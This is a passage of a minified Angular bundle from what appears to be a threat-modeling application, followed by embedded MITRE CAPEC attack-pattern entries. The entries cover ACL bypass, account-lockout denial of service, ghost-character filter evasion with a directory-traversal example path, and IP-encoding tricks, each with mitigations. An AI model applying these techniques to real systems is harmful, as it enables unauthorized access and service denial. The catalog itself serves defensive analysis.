r=this.dataService.Config.CreateThreatActor();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatActors().forEach(r=>n.children.push(i(r,n))),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-sources"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[3,"threatActor"]],template:function(e,i){1&e&&ne(0,_pt,7,2,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,xZ],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function Cpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"view_module"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.Stencils"),"\n              "))}function ypt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-stencils",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function bpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"code"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.SoftwareComponents"),"\n              "))}function Mpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)("componentType",1)}}function vpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"policy"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ProcessComponents"),"\n              "))}function Apt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)("componentType",2)}}function Tpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"portrait"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatSources"),"\n              "))}function Ept(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-sources",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Dpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"flash_on"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatCategories"),"\n              "))}function xpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-categories",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function wpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"library_books"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatLibrary"),"\n              "))}function Ipt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-library",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Rpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"rule"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.CPDFDRules"),"\n              "))}function Spt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-rules",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function kpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"security"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Controls"),"\n              "))}function Ppt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-controls",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Opt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"account_balance"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Assets"),"\n              "))}function Npt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-assets",15),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("isProject",!1)("assetGroup",e.dataService.Config.AssetGroups)("selectedNode",e.selectedNode)}}function Lpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"fact_check"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Checklists"),"\n              "))}function zpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-checklists",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}const Wpt=[{path:"configuration",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.locStorageService=n,this.dialog=r,this.router=c,this.route=d}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}ngOnInit(){if(this.dataService.Project){let e=!0;const i=this.locStorageService.Get(si.DIALOG_WARNING_CONSENT);if(i){const n=new Date(i),r=new Date;e=!(n.getMonth()==r.getMonth()&&n.getDate()==r.getDate())}if(e){const n={consent:!1,remember:!1};this.dialog.open(fut,{hasBackdrop:!1,data:n}).afterClosed().subscribe(c=>{c&&n.remember&&this.locStorageService.Set(si.DIALOG_WARNING_CONSENT,(new Date).toString())})}}this.router.events.subscribe(e=>{e instanceof Ph&&this.route.queryParams.subscribe(i=>{null!=i.index&&this.SetSelectedTabIndex(i.index)})})}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.selectedNode=null,this.locStorageService.Set(si.PAGE_CONFIG_TAB_INDEX,e)}GetSplitSize(){let e=this.locStorageService.Get(si.PAGE_CONFIG_SPLIT_SIZE_1);return null!=e?Number(e):350}OnSplitSizeChange(e){this.locStorageService.Set(si.PAGE_CONFIG_SPLIT_SIZE_1,e.sizes[0])}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r),Ee(vu),Ee(Oo),Ee(El))},t.\u0275cmp=Wt({type:t,selectors:[["app-configuration"]],features:[ci],decls:101,vars:21,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/configuration",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"height","100%",3,"selectedIndex","selectedIndexChange"],["mat-tab-label",""],["matTabContent",""],[1,"tab-icon"],[3,"selectedNode","nodeTreeChanged"],[3,"selectedNode","componentType","nodeTreeChanged"],[3,"isProject","assetGroup","selectedNode","nodeTreeChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"mat-tab-group",9),he("selectedIndexChange",function(r){return i.SetSelectedTabIndex(r)}),s(22,"\n            "),m(23,"mat-tab"),s(24,"\n              "),ne(25,Cpt,5,3,"ng-template",10),s(26,"\n              "),ne(27,ypt,3,1,"ng-template",11),s(28,"\n            "),u(),s(29,"\n\n            "),m(30,"mat-tab"),s(31,"\n              "),ne(32,bpt,5,3,"ng-template",10),s(33,"\n              "),ne(34,Mpt,3,2,"ng-template",11),s(35,"\n            "),u(),s(36,"\n\n            "),m(37,"mat-tab"),s(38,"\n              "),ne(39,vpt,5,3,"ng-template",10),s(40,"\n              "),ne(41,Apt,3,2,"ng-template",11),s(42,"\n            "),u(),s(43,"\n\n            "),m(44,"mat-tab"),s(45,"\n              "),ne(46,Tpt,5,3,"ng-template",10),s(47,"\n              "),ne(48,Ept,3,1,"ng-template",11),s(49,"\n            "),u(),s(50,"\n\n            "),m(51,"mat-tab"),s(52,"\n              "),ne(53,Dpt,5,3,"ng-template",10),s(54,"\n              "),ne(55,xpt,3,1,"ng-template",11),s(56,"\n            "),u(),s(57,"\n\n            "),m(58,"mat-tab"),s(59,"\n              "),ne(60,wpt,5,3,"ng-template",10),s(61,"\n              "),ne(62,Ipt,3,1,"ng-template",11),s(63,"\n            "),u(),s(64,"\n\n            "),m(65,"mat-tab"),s(66,"\n              "),ne(67,Rpt,5,3,"ng-template",10),s(68,"\n              "),ne(69,Spt,3,1,"ng-template",11),s(70,"\n            "),u(),s(71,"\n\n            "),m(72,"mat-tab"),s(73,"\n              "),ne(74,kpt,5,3,"ng-template",10),s(75,"\n              "),ne(76,Ppt,3,1,"ng-template",11),s(77,"\n            "),u(),s(78,"\n\n            "),m(79,"mat-tab"),s(80,"\n              "),ne(81,Opt,5,3,"ng-template",10),s(82,"\n              "),ne(83,Npt,3,3,"ng-template",11),s(84,"\n            "),u(),s(85,"\n\n            "),m(86,"mat-tab"),s(87,"\n              "),ne(88,Lpt,5,3,"ng-template",10),s(89,"\n              "),ne(90,zpt,3,1,"ng-template",11),s(91,"\n            "),u(),s(92,"\n          "),u(),s(93,"\n        "),u(),s(94,"\n      "),u(),s(95,"\n    "),u(),s(96,"\n  "),u(),s(97,"\n  "),it(98,"app-status-bar"),s(99,"\n"),u(),s(100,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize())("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size","*")("order",2),C(2),V("selectedIndex",i.GetSelectedTabIndex()))},dependencies:[Zh,xp,oa,_u,gu,Od,qh,V1,Mu,Uh,_f,gf,df,Fht,$ht,Tft,xft,kft,DZ,Qft,hpt,gpt,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}  .mat-tab-labels{display:block!important}  .mat-tab-labels .mat-tab-label{padding:0 10px!important}  .mat-tab-label{min-width:100px!important}"]}),t})()}];let Fpt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(Wpt),bs]}),t})();const $p=JSON.parse('{"1":{"ID":"1","Name":"Accessing Functionality Not Properly Constrained by ACLs","Abstraction":"Standard","Status":"Draft","Description":"In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application\'s functionality; particularly URL\'s for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"17"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Brute force guessing of resource names","Brute force guessing of user names / credentials","Brute force guessing of function names / actions"]},{"Step":"2","Phase":"Explore","Description":"[Identify Functionality] At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions","Technique":["Use the web inventory of all forms and inputs and apply attack data to those inputs.","Use a packet sniffer to capture and record network traffic","Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment."]},{"Step":"3","Phase":"Experiment","Description":"[Iterate over access capabilities] Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.","Technique":"Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)"}]},"Prerequisites":{"Prerequisite":["The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.","The various resources, or individual URLs, must be somehow discoverable by the attacker","The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource."]},"Skills_Required":{"Skill":["In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":{"p":["In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \\"NoAccess\\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.","Having done so, any direct access to those protected Servlets will be prohibited by the web container.","In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic."]}},"Example_Instances":{"Example":{"p":["Implementing the Model-View-Controller (MVC) within Java EE\'s Servlet paradigm using a \\"Single front controller\\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.","If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"276"},{"CWE_ID":"285"},{"CWE_ID":"434"},{"CWE_ID":"693"},{"CWE_ID":"732"},{"CWE_ID":"1193"},{"CWE_ID":"1220"},{"CWE_ID":"1297"},{"CWE_ID":"1311"},{"CWE_ID":"1314"},{"CWE_ID":"1315"},{"CWE_ID":"1318"},{"CWE_ID":"1320"},{"CWE_ID":"1321"},{"CWE_ID":"1327"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow: ServicesFile Permissions Weakness"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Pattern, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Pattern, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}]}},"2":{"ID":"2","Name":"Inducing Account Lockout","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Investigate account lockout behavior of system] Investigate the security features present in the system that may trigger an account lockout","Technique":["Analyze system documentation to find list of events that could potentially cause account lockout","Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly","Determine another user\'s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain list of user accounts to lock out] Generate a list of valid user accounts to lock out","Technique":["Obtain list of authorized users using another attack pattern, such as SQL Injection.","Attempt to create accounts if possible; system should indicate if a user ID is already taken.","Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts."]},{"Step":"3","Phase":"Exploit","Description":"[Lock Out Accounts] Perform lockout procedure for all accounts that the attacker wants to lock out.","Technique":"For each user ID to be locked out, perform the lockout procedure discovered in the first step."}]},"Prerequisites":{"Prerequisite":["The system has a lockout mechanism.","An attacker must be able to reproduce behavior that would result in an account being locked."]},"Skills_Required":{"Skill":["No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Computer with access to the login portion of the target system"},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.","When implementing security features, consider how they can be misused and made to turn on themselves."]},"Example_Instances":{"Example":"A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"645"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1531","Entry_Name":"Account Access Removal"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"3":{"ID":"3","Name":"Using Leading \'Ghost\' Character Sequences to Bypass Input Filters","Abstraction":"Detailed","Status":"Draft","Description":"Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading \\"ghost\\" characters (extra characters that don\'t affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary\'s input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine if the source code is available and if so, examine the filter logic."},{"Step":"2","Phase":"Experiment","Description":"If the source code is not available, write a small program that loops through various possible inputs to given API call and tries a variety of alternate (but equivalent) encodings of strings with leading ghost characters. Knowledge of frameworks and libraries used and what filters they apply will help to make this search more structured."},{"Step":"3","Phase":"Experiment","Description":"Observe the effects. See if the probes are getting past the filters. Identify a string that is semantically equivalent to that which an adversary wants to pass to the targeted API, but syntactically structured in a way as to get past the input filter. That encoding will contain certain ghost characters that will help it get past the filters. These ghost characters will be ignored by the targeted API."},{"Step":"4","Phase":"Exploit","Description":"Once the \\"winning\\" alternate encoding using (typically leading) ghost characters is identified, an adversary can launch the attacks against the targeted API (e.g. directory traversal attack, arbitrary shell command execution, corruption of files)"}]},"Prerequisites":{"Prerequisite":"The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same."},"Skills_Required":{"Skill":["The ability to make an API request, and knowledge of \\"ghost\\" characters that will not be filtered by any input validation. These \\"ghost\\" characters must be known to not affect the way in which the request will be interpreted.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use an allowlist rather than a denylist input validation.","Canonicalize all data prior to validation.","Take an iterative approach to input validation (defense in depth)."]},"Example_Instances":{"Example":{"p":["Alternate Encoding with Ghost Characters in FTP and Web Servers","Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname \\"../test.txt\\" may erroneously allow access to that file if the pathname is specified as \\".../test.txt\\". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn\'t dot-dot), 2) some part of the input processing decided to strip off the \\"extra\\" dot, leaving the dot-dot behind.","Using the file system API as the target, the following strings are all equivalent to many programs:","As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt."],"div":[".../../../test.txt",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"41"},{"CWE_ID":"172"},{"CWE_ID":"179"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"183"},{"CWE_ID":"184"},{"CWE_ID":"20"},{"CWE_ID":"74"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Payload"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"4":{"ID":"4","Name":"Using Alternative IP Address Encodings","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a variety of different possible encodings and formats, the adversary can use an alternate format to bypass application access control.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Prerequisites":{"Prerequisite":["The target software must fail to anticipate all of the possible valid encodings of an IP/web address.","The adversary must have the ability to communicate with the server."]},"Skills_Required":{"Skill":["The adversary has only to try IP address format combinations.",{"Level":"Low"}]},"Resources_Required":{"Resource":"The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Design: Default deny access control policies","Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)","Implementation: Perform input validation for all remote content."]},"Example_Instances":{"Example":"An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"291"},{"CWE_ID":"173"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The 